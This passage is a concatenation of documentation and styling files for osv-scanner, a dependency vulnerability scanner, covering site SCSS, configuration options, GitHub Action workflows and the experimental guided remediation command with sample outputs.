$white: #fff !default; $grey-dk-000: #959396 !default; $grey-dk-100: #5c5962 !default; $grey-dk-200: #44434d !default; $grey-dk-250: #302d36 !default; $grey-dk-300: #27262b !default; $grey-lt-000: #f5f6fa !default; $grey-lt-100: #eeebee !default; $grey-lt-200: #ecebed !default; $grey-lt-300: #e6e1e8 !default; $purple-000: #7253ed !default; $purple-100: #5e41d0 !default; $purple-200: #4e26af !default; // Override the default purple 300 for better visibility $purple-300: #d7c6ff; $blue-000: #2c84fa !default; $blue-100: #2869e6 !default; $blue-200: #264caf !default; $blue-300: #183385 !default; $green-000: #41d693 !default; $green-100: #11b584 !default; $green-200: #009c7b !default; $green-300: #026e57 !default; // Override the default yellow 000 for better visibility $yellow-000: #5f4f00; $yellow-100: #fadf50 !default; $yellow-200: #f7d12e !default; $yellow-300: #e7af06 !default; $red-000: #f77e7e !default; $red-100: #f96e65 !default; $red-200: #e94c4c !default; $red-300: #dd2e2e !default; $body-font-family: "Source Sans 3", system-ui, -apple-system, sans-serif; $mono-font-family: consolas, monospace; ================================================ FILE: docs/_sass/color_schemes/custom_dark.scss ================================================ @import "./variables"; @import "../highlight/native.scss"; @import url("https://fonts.googleapis.com/css2?family=Overpass:ital,wght@0,100..900;1,100..900&family=Source+Sans+3:ital,wght@0,200..900;1,200..900&display=swap"); $new-body-background-color: #292929; // Overriding dark default for just-the-docs styles $color-scheme: dark; $body-background-color: $new-body-background-color; // Replacing default $grey-dk-300 $body-heading-color: $white; // Replacing default $grey-lt-000 $body-text-color: $white; //Replacing default $grey-lt-300 $link-color: #c9f5f7; $nav-child-link-color: $white; // Replacing default $grey-dk-000 $sidebar-color: $new-body-background-color; //Replacing default $grey-dk-300 $base-button-color: $grey-dk-250; $btn-primary-color: $blue-200; $code-background-color: #202020; // Important to match with .highlight background and .highlight.err background-color $code-linenumber-color: #f5f6fa; // Important to match with .highlight.nf color $feedback-color: darken($sidebar-color, 3%); $table-background-color: lighten( $new-body-background-color, 5% ); // Replacing default $grey-dk-250 $search-background-color: $new-body-background-color; // Replacing default $grey-dk-250 $search-result-preview-color: $grey-dk-000; $border-color: #6a6a6a; // Replacing default $grey-dk-200 ================================================ FILE: docs/_sass/custom/custom.scss ================================================ // Always show child pages in the navigation menu // https://github.com/just-the-docs/just-the-docs/issues/245#issuecomment-656334333 .nav-list .nav-list-item > .nav-list { display: block !important; } // Hide the child page expand arrow, since it doesn't do anything .nav-list .nav-list-expander { display: none !important; } :not(pre, figure) code { padding: 0.2rem 0.35rem !important; font-size: 0.85em; } h1, h2, h3, h4 { font-family: "Overpass", system-ui, -apple-system, sans-serif; } table { border-collapse: collapse; th { border-bottom-width: 2px; } } .site-title { padding-top: 15px !important; } // Fix callout styling regression introduced in just-the-docs v0.11.0 which // replaced the colored background fill with an all-sides border outline. @mixin callout-fix($bg-color, $border-color) { border: none; border-left: $border-radius solid $border-color; background: rgba($bg-color, 0.2); } p.note, blockquote.note { @include callout-fix($purple-000, $purple-300); } p.warning, blockquote.warning { @include callout-fix($red-000, $red-300); } p.highlight, blockquote.highlight { @include callout-fix($yellow-000, $yellow-300); } ================================================ FILE: docs/_sass/highlight/native.scss ================================================ // Based on https://github.com/dwayne/sass-pygments/blob/master/styles/scss/native.scss .highlight, pre.highlight, .highlight code { color: #d0d0d0; background: #202020; .hll { background-color: #404040; } .c { color: #999999; font-style: italic; } .err { color: #d0d0d0; // Replacing default #a61717 with default text code for code block background-color: #202020; // Replacing default #e3d2d2 with background for the code block } .esc, .g { color: #d0d0d0; } .k { color: #6ab825; font-weight: bold; } .l, .n, .o, .x, .p { color: #d0d0d0; } .ch, .cm { color: #999999; font-style: italic; } .cp { color: #cd2828; font-weight: bold; } .cpf, .c1 { color: #999999; font-style: italic; } .cs { color: #e50808; font-weight: bold; background-color: #520000; } .gd { color: #d22323; } .ge { color: #d0d0d0; font-style: italic; } .gr { color: #d22323; } .gh { color: #ffffff; font-weight: bold; } .gi { color: #589819; } .go { color: #cccccc; } .gp { color: #aaaaaa; } .gs { color: #d0d0d0; font-weight: bold; } .gu { color: #ffffff; text-decoration: underline; } .gt { color: #d22323; } .kc, .kd, .kn { color: #6ab825; font-weight: bold; } .kp { color: #6ab825; } .kr, .kt { color: #6ab825; font-weight: bold; } .ld { color: #d0d0d0; } .m { color: #3677a9; } .s { color: #ed9d13; } .na { color: #bbbbbb; } .nb { color: #24909d; } .nc { color: #f5f6fa; text-decoration: underline; } .no { color: #40ffff; } .nd { color: #ffa500; } .ni { color: #d0d0d0; } .ne { color: #bbbbbb; } .nf { color: #f5f6fa; } .nl { color: #d0d0d0; } .nn { color: #f5f6fa; text-decoration: underline; } .nx, .py { color: #d0d0d0; } .nt { color: #6ab825; font-weight: bold; } .nv { color: #40ffff; } .ow { color: #6ab825; font-weight: bold; } .w { color: #666666; } .mb, .mf, .mh, .mi, .mo { color: #3677a9; } .sb, .sc, .sd, .s2, .se, .sh, .si { color: #ed9d13; } .sx { color: #ffa500; } .sr, .s1, .ss { color: #ed9d13; } .bp { color: #24909d; } .vc, .vg, .vi { color: #40ffff; } .il { color: #3677a9; } } /* Comment */ /* Error */ /* Escape */ /* Generic */ /* Keyword */ /* Literal */ /* Name */ /* Operator */ /* Other */ /* Punctuation */ /* Comment.Hashbang */ /* Comment.Multiline */ /* Comment.Preproc */ /* Comment.PreprocFile */ /* Comment.Single */ /* Comment.Special */ /* Generic.Deleted */ /* Generic.Emph */ /* Generic.Error */ /* Generic.Heading */ /* Generic.Inserted */ /* Generic.Output */ /* Generic.Prompt */ /* Generic.Strong */ /* Generic.Subheading */ /* Generic.Traceback */ /* Keyword.Constant */ /* Keyword.Declaration */ /* Keyword.Namespace */ /* Keyword.Pseudo */ /* Keyword.Reserved */ /* Keyword.Type */ /* Literal.Date */ /* Literal.Number */ /* Literal.String */ /* Name.Attribute */ /* Name.Builtin */ /* Name.Class */ /* Name.Constant */ /* Name.Decorator */ /* Name.Entity */ /* Name.Exception */ /* Name.Function */ /* Name.Label */ /* Name.Namespace */ /* Name.Other */ /* Name.Property */ /* Name.Tag */ /* Name.Variable */ /* Operator.Word */ /* Text.Whitespace */ /* Literal.Number.Bin */ /* Literal.Number.Float */ /* Literal.Number.Hex */ /* Literal.Number.Integer */ /* Literal.Number.Oct */ /* Literal.String.Backtick */ /* Literal.String.Char */ /* Literal.String.Doc */ /* Literal.String.Double */ /* Literal.String.Escape */ /* Literal.String.Heredoc */ /* Literal.String.Interpol */ /* Literal.String.Other */ /* Literal.String.Regex */ /* Literal.String.Single */ /* Literal.String.Symbol */ /* Name.Builtin.Pseudo */ /* Name.Variable.Class */ /* Name.Variable.Global */ /* Name.Variable.Instance */ /* Literal.Number.Integer.Long */ ================================================ FILE: docs/configuration.md ================================================ --- layout: page permalink: /configuration/ nav_order: 5 --- # Configuration To configure scanning, place an osv-scanner.toml file in the scanned file's directory. This does not propagate to child directories. **Example:** ``` /Cargo.lock /osv-scanner.toml (1) /child-dir/go.mod /child-dir/osv-scanner.toml (2) /child-dir/nested-dir/package-lock.json ``` `osv-scanner.toml (1)` will only apply to `Cargo.lock`, `osv-scanner.toml (2)` will only apply to `go.mod`, and no config will apply to `package-lock.json`. To override `osv-scanner.toml` files, pass the `--config=/path/to/config.toml` flag with the path to the configuration you want to apply instead, this will apply `config.toml` to all files parsed, and ignore `osv-scanner.toml` in all directories. ## Ignore vulnerabilities by ID To ignore a vulnerability, enter the ID under the `IgnoreVulns` key. Optionally, add an expiry date or reason. ### Example ```toml [[IgnoredVulns]] id = "GO-2022-0968" # ignoreUntil = 2022-11-09 # Optional exception expiry date reason = "No ssh servers are connected to or hosted in Go lang" [[IgnoredVulns]] id = "GO-2022-1059" # ignoreUntil = 2022-11-09 # Optional exception expiry date reason = "No external http servers are written in Go lang." ``` Ignoring a vulnerability will also ignore vulnerabilities that are considered aliases of that vulnerability. ## Override packages You can specify overrides for particular packages to have them either ignored entirely or to set their license using the `PackageOverrides` key: ```toml [[PackageOverrides]] # One or more fields to match each package against: name = "lib" version = "1.0.0" ecosystem = "Go" group = "dev" # Actions to take for matching packages: ignore = true # Ignore this package completely, including both reporting vulnerabilities and license violations vulnerability.ignore = true # Ignore vulnerabilities for this package, while still checking the license (if not also ignored) license.ignore = true # Ignore the license of the package, while still checking for vulnerabilities (if not also ignored) license.override = ["MIT", "0BSD"] # Override the license of the package, if it is not ignored from license scanning completely effectiveUntil = 2022-11-09 # Optional exception expiry date, after which the override will no longer apply reason = "abc" # Optional reason for the override, to explain why it was added ``` Overrides are applied if all the configured fields match, enabling you to create very broad or very specific overrides based on your needs: ```toml # ignore everything in the current directory [[PackageOverrides]] ignore = true # ignore a particular group [[PackageOverrides]] group = "dev" ignore = true # ignore a particular ecosystem [[PackageOverrides]] ecosystem = "go" ignore = true # ignore packages named "axios" regardless of ecosystem or group [[PackageOverrides]] name = "axios" ignore = true # ignore packages named "axios" in the npm ecosystem that are in the dev group [[PackageOverrides]] name = "axios" ecosystem = "npm" group = "dev" ignore = true # ... and so on ``` ## Go Version Override Use the `GoVersionOverride` key to override the Go version used for scanning. This is useful when the scanner fails to detect the correct Go version or when you want to force a specific version. ### Example ```toml # Do not add a prefix (e.g. go1.20.0 is just 1.20.0) GoVersionOverride = "1.20.0" ``` ================================================ FILE: docs/contribute.md ================================================ --- layout: page permalink: /contribute/ nav_order: 9 --- # Contribute ## Report Problems If you have what looks like a bug, please use the [Github issue tracking system](https://github.com/google/osv-scanner/issues). Before you file an issue, please search existing issues to see if your issue is already covered. ## Contributing to `osv-scanner` See [CONTRIBUTING.md](https://github.com/google/osv-scanner/blob/main/CONTRIBUTING.md) for general contribution information and for details on how to contribute [code](https://github.com/google/osv-scanner/blob/main/CONTRIBUTING.md/#contributing-code) and [documentation](https://github.com/google/osv-scanner/blob/main/CONTRIBUTING.md/#contributing-documentation). ================================================ FILE: docs/docs.Dockerfile ================================================ # Use an official Ruby runtime as a parent image. FROM ruby:3@sha256:cddc8a7877ed0213dbd4a3cf726e357ac27e493fefa8b5350e7936f4ec02018e # Set the working directory in the container. WORKDIR /usr/src/app # Copy the Gemfile and Gemfile.lock. # This is done first to leverage Docker's layer caching. COPY ./Gemfile* ./ # Install the dependencies. RUN bundle install # Copy the rest of the documentation files. COPY ./ ./ # Expose port 4000 for the Jekyll server. EXPOSE 4000 # The command to run when the container starts. # --host 0.0.0.0 is important to make the server accessible from outside the container. CMD ["bundle", "exec", "jekyll", "serve", "--host", "0.0.0.0"] ================================================ FILE: docs/experimental.md ================================================ --- layout: page permalink: /experimental/ nav_order: 8 has_children: true --- # Experimental Features {: .no_toc } These features are currently under development. While their functionality may be subject to change, they are available for you to try. {: .note } Features and flags with the `experimental` prefix might change or be removed with only a minor version update. ================================================ FILE: docs/github-action.md ================================================ --- layout: page permalink: /github-action/ nav_order: 7 --- # GitHub Action {: .no_toc }
Table of contents {: .text-delta } - TOC {:toc}
OSV-Scanner is available as a CI/CD Action. We currently offer two different reusable workflows for Github: 1. A workflow that triggers a scan with each [pull request](./github-action.md#scan-on-pull-request) and will only report new vulnerabilities introduced through the pull request. 2. A workflow that performs a full vulnerability scan, which can be configured to scan on pushes or a [regular schedule](./github-action.md#scheduled-scans). The full vulnerability scan can also be configured to run [on release](./github-action.md#scan-on-release) to prevent releasing with known vulnerabilities in dependencies. Currently, there is no prebuilt workflows for other platforms, but we welcome any contributions for this! ## Scan on pull request Scanning your project on each pull request can help you keep vulnerabilities out of your project. This GitHub Action compares a vulnerability scan of the target branch to a vulnerability scan of the feature branch, and will fail if there are new vulnerabilities introduced through the feature branch. You may choose to [prevent merging](https://docs.github.com/en/repositories/configuring-branches-and-merges-in-your-repository/managing-protected-branches/about-protected-branches#require-status-checks-before-merging) if new vulnerabilities are introduced, but by default the check will only warn users. ### Instructions In your project repository, create a new file `.github/workflows/osv-scanner-pr.yml`. Include the following in the `osv-scanner-pr.yml` file: ```yml name: OSV-Scanner PR Scan # Change "main" to your default branch if you use a different name, i.e. "master" on: pull_request: branches: [main] merge_group: branches: [main] permissions: # Required to upload SARIF file to CodeQL. See: https://github.com/github/codeql-action/issues/2117 actions: read # Require writing security events to upload SARIF file to security tab security-events: write # Only need to read contents contents: read jobs: scan-pr: uses: "google/osv-scanner-action/.github/workflows/osv-scanner-reusable-pr.yml@v2.3.4" ``` ### View results Results may be viewed by clicking on the details of the failed action, either from your project's actions tab or directly on the PR. | OSV-Scanner PR Check Failing | PR Scanning Check Output | | :---------------------------------------------------------------------------------------------------------------------------: | :-----------------------------------------------------------------------: | | ![Screenshot of PR introducing a vulnerable dependency, and osv-scanner blocking check](images/github-action-PR-scanning.png) | ![Screenshot of osv-scanner output](images/github-action-scan-output.png) | Results are also included in GitHub annotations on the "Files changed" tab for the PR. ## Scheduled scans Regularly scanning your project for vulnerabilities can alert you to new vulnerabilities in your dependency tree. This GitHub Action will scan your project on a set schedule and report all known vulnerabilities. If vulnerabilities are found the action will return a failed status. ### Instructions In your project repository, create a new file `.github/workflows/osv-scanner-scheduled.yml`. Include the following in the `osv-scanner-scheduled.yml` file: ```yml name: OSV-Scanner Scheduled Scan on: schedule: - cron: "30 12 * * 1" # Change "main" to your default branch if you use a different name, i.e. "master" push: branches: [main] permissions: # Required to upload SARIF file to CodeQL. See: https://github.com/github/codeql-action/issues/2117 actions: read # Require writing security events to upload SARIF file to security tab security-events: write # Only need to read contents contents: read jobs: scan-scheduled: uses: "google/osv-scanner-action/.github/workflows/osv-scanner-reusable.yml@v2.3.4" ``` As written, the scanner will run on 12:30 pm UTC every Monday, and also on every push to the main branch. You can change the schedule by following the instructions [here](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#schedule). ### View results Maintainers can review results of the scan by navigating to their project's `security > code scanning` tab. Vulnerability details can also be viewed by clicking on the details of the failed action. | OSV-Scanner Code Scanning Tab | Code Scanning Detailed Entry | | :------------------------------------------------------------------------------: | :-------------------------------------------------------------------------------------------: | | ![Image of results in code scanning tab](images/github-action-code-scanning.png) | ![Image of details of specific in code scanning entry](images/github-action-code-details.png) | ## Scan on release Here is an example of blocking on release, though the actual implementation will heavily depend on your specific release process. ```yml name: Go Release Process on: push: tags: - "*" # triggers only if push new tag version, like `0.8.4` or else permissions: # Required to upload SARIF file to CodeQL. See: https://github.com/github/codeql-action/issues/2117 actions: read # Require writing security events to upload SARIF file to security tab security-events: write # to fetch code (actions/checkout) contents: read jobs: osv-scan: uses: "google/osv-scanner-action/.github/workflows/osv-scanner-reusable-pr.yml@v2.3.2" with: # Only scan the top level go.mod file without recursively scanning directories since # this is pipeline is about releasing the go module and binary scan-args: |- ./ permissions: # Require writing security events to upload SARIF file to security tab security-events: write tests: name: Run unit tests ... release: needs: # Needs both tests and osv-scan to pass - tests - osv-scan # Your actual release steps steps: ... ``` ### View results Results may be viewed by clicking on the details of the failed release action from the action tab. ## Customization The GitHub Actions have the following optional inputs: - `scan-args`: This value is passed to `osv-scanner` CLI after being split by each line. See the [usage](./usage.md) page for the available options. The `--format` and `--output` flags are already set by the reusable workflow and should not be overridden here. Default: ```bash --recursive # Recursively scan subdirectories ./ # Start the scan from the root of the repository ``` - `results-file-name`: This is the name of the final SARIF file uploaded to Github. Default: `results.sarif` - `download-artifact`: Optional artifact to download for scanning. Can be used if you need to do some preprocessing to prepare the lockfiles for scanning. If the file names in the artifact are not standard lockfile names, make sure to add custom scan-args to specify the lockfile type and path (see [specify lockfiles](./usage.md#specify-lockfiles)). - `upload-sarif`: Whether to upload the results to Security > Code Scanning. Defaults to `true`. - `fail-on-vuln`: Whether to fail the workflow when a vulnerability is found. Defaults to `true`. - `matrix-property`: Optional, adds support for matrix strategies by inserting a unique variable per job run. (E.g. `amd64-`) Defaults to `""`.
Examples #### Scan specific lockfiles ```yml jobs: scan-pr: uses: "google/osv-scanner-action/.github/workflows/osv-scanner-reusable.yml@v2.3.4" with: scan-args: |- --lockfile=./path/to/lockfile1 --lockfile=requirements.txt:./path/to/python-lockfile2.txt ``` #### Default arguments ```yml jobs: scan-pr: uses: "google/osv-scanner-action/.github/workflows/osv-scanner-reusable.yml@v2.3.4" with: scan-args: |- --recursive ./ ``` #### Using download-artifact input to support preprocessing ```yml jobs: extract-deps: name: Extract Dependencies # ... steps: # ... Steps to extract your dependencies - name: "upload osv-scanner deps" # Upload the deps uses: actions/upload-artifact@v4 with: name: converted-OSV-Scanner-deps path: osv-scanner-deps.json retention-days: 2 vuln-scan: name: Vulnerability scanning # makes sure the extraction step is completed before running the scanner needs: extract-deps uses: "google/osv-scanner-action/.github/workflows/osv-scanner-reusable.yml@v2.3.4" with: # Download the artifact uploaded in extract-deps step download-artifact: converted-OSV-Scanner-deps # Scan only the file inside the uploaded artifact scan-args: |- --lockfile=osv-scanner:osv-scanner-deps.json permissions: # Needed to upload the SARIF results to code-scanning dashboard. security-events: write contents: read actions: read ``` #### Using download-artifact with matrix ```yml jobs: extract-deps: strategy: fail-fast: false matrix: platform: [ {target_arch: amd64}, {target_arch: armv7} {target_arch: armhf}, {target_arch: aarch64} ] name: Extract Dependencies # ... steps: # ... Steps to extract your dependencies for each matrix run - name: "upload osv-scanner deps" # Upload the deps uses: actions/upload-artifact@v4 with: name: ${{ matrix.platform.target_arch }}-OSV-Scanner-deps path: osv-scanner-deps.json retention-days: 2 vuln-scan: needs: - extract-deps strategy: fail-fast: false matrix: platform: [ {target_arch: amd64}, {target_arch: armv7} {target_arch: armhf}, {target_arch: aarch64} ] uses: "extract/osv-scanner/.github/workflows/osv-scanner-reusable.yml@v2.3.4" with: download-artifact: "${{ matrix.platform.target_arch }}-OSV-Scanner-deps" matrix-property: "${{ matrix.platform.target_arch }}-" scan-args: |- --lockfile=osv-scanner:osv-scanner-deps.json --recursive ./ permissions: security-events: write contents: read actions: read ```
================================================ FILE: docs/guided-remediation.md ================================================ --- layout: page permalink: /experimental/guided-remediation/ parent: Experimental Features nav_order: 3 --- # Guided Remediation Experimental {: .label } {: .no_toc }
Table of contents {: .text-delta } - TOC {:toc}
Guided remediation (`osv-scanner fix`) aims to help developers with fixing the high number of known vulnerabilities in dependencies typically reported by vulnerability scanners by providing a small number of actionable steps. This tool provides several options to users for how to prioritise and remediate their vulnerabilities, with easy to understand information on how we arrived at these options and how to compare them. This includes features such as: - Resolution and analysis of the entire transitive graph (leveraging [deps.dev](https://deps.dev)) to determine the minimal changes required to remove vulnerabilities. - Prioritising direct dependency upgrades by the total number of transitive vulnerabilities fixed. - Prioritising vulnerabilities by dependency depth, severity, and whether to care about dev-only dependencies. - Modification of package manifest and lockfiles (e.g. `package.json`/`package-lock.json`) to fix vulnerabilities. - Different strategies with different risk/reward ratios (e.g. in-place fixes vs relocking). {: .note } This feature is experimental and might change or be removed with only a minor version update. ### Supported strategies We currently support remediating vulnerabilities in the following files: | Ecosystem | File Format (Type) | Supported [Remediation Strategies](#remediation-strategies) | | :-------- | :---------------------------------------------------------------------------------------- | :---------------------------------------------------------- | | npm | `package-lock.json` (lockfile) | [`in-place`](#in-place-lockfile-changes) | | npm | `package.json` (manifest) | [`relock`](#relock-and-relax-direct-dependencies) | | Maven | `pom.xml` (manifest)[note](#pom-note) | [`override`](#override-dependency-versions) | {: .note #pom-note} By default, the tool only checks dependencies that are actually present in a POM's dependency graph - it will not detect vulnerabilities in `` dependencies if they are not actually used when resolving the POM. The [`--maven-fix-management`](#maven-flags) flag can be used to also fix them. ## Basic usage To fix as many vulnerabilities as possible in your `package-lock.json` file [in-place](#in-place-lockfile-changes), you can use the following command: ```bash osv-scanner fix --strategy=in-place -L path/to/package-lock.json ``` Alternatively, to potentially resolve even more vulnerabilities with larger (potentially breaking) changes, you can [regenerate your lockfile and update your direct dependencies](#relock-and-relax-direct-dependencies) with the following command: ```bash osv-scanner fix --strategy=relax -M path/to/package.json -L path/to/package-lock.json ``` For Maven `pom.xml` files, you can update direct dependencies and [add version overrides](#override-dependency-versions) to your POM's `` section with the following command: ```bash osv-scanner fix --strategy=override -M path/to/pom.xml ``` {: .warning } The subcommand will modify your manifest and lockfile. Make sure you commit or backup your files before running. {: .note } The subcommand will not reinstall your `node_modules/` - you will need to manually run `npm ci` to install dependencies. If you wish to remediation only specific vulnerabilities, you may specify OSV IDs using the `--vulns` flag. [See all remediation flags](#remediation-flags). ### Output formats Non-interactive mode outputs to the terminal the actions taken and vulnerabilities remediated. The output format can be controlled with the `--format` flag. {: .highlight } The output formats may change with minor version updates. #### Text (default) The default format. ```bash osv-scanner fix --format text --strategy=in-place -L path/to/package-lock.json ```
Sample in-place text output ``` Scanning path/to/package-lock.json... Found 55 vulnerabilities matching the filter Can fix 25/55 matching vulnerabilities by changing 21 dependencies UPGRADED-PACKAGE: lodash,4.17.20,4.17.21 UPGRADED-PACKAGE: minimist,1.2.0,1.2.8 UPGRADED-PACKAGE: ws,6.2.1,6.2.3 UPGRADED-PACKAGE: ws,7.1.2,7.5.10 UPGRADED-PACKAGE: acorn,5.7.3,5.4.1 UPGRADED-PACKAGE: acorn,6.0.2,6.4.2 UPGRADED-PACKAGE: acorn,7.1.0,7.4.1 UPGRADED-PACKAGE: ansi-regex,3.0.0,3.0.1 UPGRADED-PACKAGE: dat.gui,0.7.3,0.7.9 UPGRADED-PACKAGE: get-func-name,2.0.0,2.0.2 UPGRADED-PACKAGE: glob-parent,5.0.0,5.1.2 UPGRADED-PACKAGE: json5,2.1.0,2.2.3 UPGRADED-PACKAGE: minimist,1.2.5,1.2.8 UPGRADED-PACKAGE: node-fetch,2.6.6,2.7.0 UPGRADED-PACKAGE: path-parse,1.0.6,1.0.7 UPGRADED-PACKAGE: pathval,1.1.0,1.1.1 UPGRADED-PACKAGE: qs,6.5.2,6.5.3 UPGRADED-PACKAGE: semver,5.5.1,5.7.2 UPGRADED-PACKAGE: semver,5.6.0,5.7.2 UPGRADED-PACKAGE: semver,6.3.0,6.3.1 UPGRADED-PACKAGE: y18n,4.0.0,4.0.3 FIXED-VULN-IDS: GHSA-29mw-wpgm-hmr9,GHSA-35jh-r3h4-6jhm,GHSA-3h5v-q93c-6h6q,GHSA-3h5v-q93c-6h6q,GHSA-4q6p-r6v2-jvc5,GHSA-6chw-6frg-f759,GHSA-6chw-6frg-f759,GHSA-6chw-6frg-f759,GHSA-6fc8-4gx4-v693,GHSA-6fc8-4gx4-v693,GHSA-93q8-gq69-wqmw,GHSA-9c47-m6qq-7p4h,GHSA-c2qf-rxjj-qqgw,GHSA-c2qf-rxjj-qqgw,GHSA-c2qf-rxjj-qqgw,GHSA-c4w7-xm78-47vh,GHSA-chwr-hf3w-c984,GHSA-g6ww-v8xp-vmwg,GHSA-hj48-42vr-x3v9,GHSA-hrpp-h998-j3pp,GHSA-r683-j2x4-v87g,GHSA-vh95-rmgr-6w4m,GHSA-ww39-953v-wcq6,GHSA-xvch-5gv4-984h,GHSA-xvch-5gv4-984h REMAINING-VULNS: 30 UNFIXABLE-VULNS: 30 Rewriting path/to/package-lock.json... ```
```bash osv-scanner fix --format text --strategy=relax -M path/to/package.json -L path/to/package-lock.json ```
Sample relax text output ``` Resolving path/to/package.json... Found 12 vulnerabilities matching the filter Can fix 9/12 matching vulnerabilities by changing 6 dependencies UPGRADED-PACKAGE: mocha,^5.2.0,^9.2.2 UPGRADED-PACKAGE: @google-cloud/cloudbuild,^2.6.0,^4.5.0 UPGRADED-PACKAGE: autoprefixer,^9.3.0,^10.4.20 UPGRADED-PACKAGE: google-closure-library,^20190909.0.0,^20200315.0.0 UPGRADED-PACKAGE: terser,^3.10.11,^4.8.1 UPGRADED-PACKAGE: yargs,^12.0.2,^13.3.2 FIXED-VULN-IDS: GHSA-4wf5-vphf-c2xc,GHSA-7fh5-64p2-3v2j,GHSA-7v5v-9h63-cj86,GHSA-f8q6-p94x-37v3,GHSA-h755-8qp9-cq85,GHSA-p9pc-299p-vxgp,GHSA-vh5w-fg69-rc8m,GHSA-vh95-rmgr-6w4m,GHSA-xvch-5gv4-984h REMAINING-VULNS: 3 UNFIXABLE-VULNS: 3 Rewriting path/to/package.json... Shelling out to regenerate lockfile... Executing `/usr/bin/npm install --package-lock-only`... ```
```bash osv-scanner fix --format text --strategy=override -M path/to/pom.xml ```
Sample override output ``` Resolving path/to/pom.xml... Found 60 vulnerabilities matching the filter Can fix 44/60 matching vulnerabilities by overriding 24 dependencies OVERRIDE-PACKAGE: io.atomix:atomix,3.1.6 OVERRIDE-PACKAGE: org.apache.pdfbox:pdfbox,2.0.24 OVERRIDE-PACKAGE: xerces:xercesImpl,2.12.2 OVERRIDE-PACKAGE: com.google.guava:guava,32.0.0-jre OVERRIDE-PACKAGE: org.apache.mina:mina-core,2.0.27 OVERRIDE-PACKAGE: com.fasterxml.jackson.core:jackson-databind,2.12.7.1 OVERRIDE-PACKAGE: io.netty:netty-handler,4.1.94.Final OVERRIDE-PACKAGE: org.apache.commons:commons-compress,1.26.0 OVERRIDE-PACKAGE: org.apache.commons:commons-configuration2,2.10.1 OVERRIDE-PACKAGE: org.apache.shiro:shiro-web,1.13.0 OVERRIDE-PACKAGE: org.eclipse.jgit:org.eclipse.jgit,5.13.3.202401111512-r OVERRIDE-PACKAGE: com.nimbusds:nimbus-jose-jwt,9.37.2 OVERRIDE-PACKAGE: commons-io:commons-io,2.14.0 OVERRIDE-PACKAGE: io.netty:netty,3.9.8.Final OVERRIDE-PACKAGE: io.netty:netty-common,4.1.115.Final OVERRIDE-PACKAGE: org.apache.directory.api:api-ldap-model,1.0.0-M31 OVERRIDE-PACKAGE: org.apache.shiro:shiro-core,1.13.0 OVERRIDE-PACKAGE: org.eclipse.jetty:jetty-http,12.0.12 OVERRIDE-PACKAGE: org.eclipse.jetty:jetty-server,9.4.56.v20240826 OVERRIDE-PACKAGE: org.glassfish.jersey.core:jersey-common,2.34 OVERRIDE-PACKAGE: xalan:xalan,2.7.3 OVERRIDE-PACKAGE: org.apache.thrift:libthrift,0.14.0 OVERRIDE-PACKAGE: org.apache.tomcat.embed:tomcat-embed-core,8.5.99 OVERRIDE-PACKAGE: io.netty:netty-codec,4.1.68.Final FIXED-VULN-IDS: GHSA-2fqw-684c-pvp7,GHSA-2h3j-m7gr-25xj,GHSA-3p86-9955-h393,GHSA-4265-ccf5-phj5,GHSA-4g9r-vxhx-9pgx,GHSA-4jhc-wjr3-pwh2,GHSA-5h29-qq92-wj7f,GHSA-5mg8-w23w-74h3,GHSA-6mcm-j9cj-3vc3,GHSA-6mjq-h674-j845,GHSA-6vqp-h455-42mr,GHSA-6vvh-5794-vpmj,GHSA-76h9-2vwh-w278,GHSA-78wr-2p64-hpwj,GHSA-7fr2-94h7-ccg2,GHSA-7g45-4rm6-3mm3,GHSA-7grw-6pjh-jpc9,GHSA-7j4h-8wpf-rqfh,GHSA-9339-86wc-4qgf,GHSA-9w38-p64v-xpmv,GHSA-c43q-5hpj-4crv,GHSA-cx3q-cv6w-mx4h,GHSA-fg3j-q579-v8x4,GHSA-g2fg-mr77-6vrm,GHSA-g7p8-r2ch-4rmf,GHSA-g8m5-722r-8whq,GHSA-gvpg-vgmx-xg6w,GHSA-h65f-jvqw-m9fj,GHSA-hhw5-c326-822h,GHSA-jc7h-c423-mpjc,GHSA-jjjh-jjxp-wpff,GHSA-m4h3-7mc2-v295,GHSA-mf27-wg66-m8f5,GHSA-mm9x-g8pc-w292,GHSA-mvr2-9pj6-7w5j,GHSA-pmhc-2g4f-85cg,GHSA-q446-82vq-w674,GHSA-qh8g-58pp-2wxh,GHSA-rgv9-q543-rqg4,GHSA-vmqm-g3vh-847m,GHSA-w4jq-qh47-hvjq,GHSA-xfv3-rrfm-f2rv,GHSA-xjp4-hw94-mvp5,GHSA-xq3w-v528-46rv REMAINING-VULNS: 16 UNFIXABLE-VULNS: 15 Rewriting path/to/pom.xml... ```
#### JSON Outputs the results as a JSON object to stdout, with all other output being directed to stderr - this makes it safe to redirect the output to a file. The `json` format is expected to be stable. It is intended to be suitable for integration with automated tooling. ```bash osv-scanner fix --format json --strategy=relax -M path/to/package.json ```
Sample relax JSON output ```json { "path": "path/to/package.json", "ecosystem": "npm", "strategy": "relax", "vulnerabilities": [ { "id": "GHSA-gcx4-mw62-g8wm", "packages": [ { "name": "rollup", "version": "1.32.1" } ], "unactionable": true }, { "id": "GHSA-h755-8qp9-cq85", "packages": [ { "name": "protobufjs", "version": "6.11.3" } ] }, { "id": "GHSA-pfq8-rq6v-vf5m", "packages": [ { "name": "html-minifier", "version": "4.0.0" } ], "unactionable": true }, { "id": "GHSA-xvch-5gv4-984h", "packages": [ { "name": "minimist", "version": "0.0.8" } ] } ], "patches": [ { "packageUpdates": [ { "name": "@google-cloud/cloudbuild", "versionFrom": "^2.6.0", "versionTo": "^4.7.0", "transitive": false } ], "fixed": [ { "id": "GHSA-h755-8qp9-cq85", "packages": [ { "name": "protobufjs", "version": "6.11.3" } ] } ] }, { "packageUpdates": [ { "name": "mocha", "versionFrom": "^5.2.0", "versionTo": "^8.4.0", "transitive": false } ], "fixed": [ { "id": "GHSA-xvch-5gv4-984h", "packages": [ { "name": "minimist", "version": "0.0.8" } ] } ] } ] } ```
```bash osv-scanner fix --format json --strategy=override -M path/to/pom.xml ```
